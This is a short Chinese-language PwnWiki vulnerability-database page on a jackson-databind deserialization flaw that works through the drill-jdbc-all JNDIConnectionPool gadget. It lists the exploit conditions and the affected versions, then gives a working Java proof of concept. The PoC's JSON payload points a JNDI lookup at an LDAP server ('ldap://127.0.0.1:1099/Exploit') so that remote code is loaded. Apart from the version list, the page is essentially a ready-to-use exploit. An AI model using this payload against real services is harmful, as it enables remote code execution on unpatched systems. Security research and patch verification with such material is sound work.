PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
利用条件
开启enableDefaultTyping()
使用了org.apache.drill.exec:drill-jdbc-all第三方依赖
影响版本
jackson-databind before 2.9.10.4 jackson-databind before 2.8.11.6 jackson-databind before 2.7.9.7
POC
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}";
try {
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
} catch (IOException e) {
e.printStackTrace();
}
}
}
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
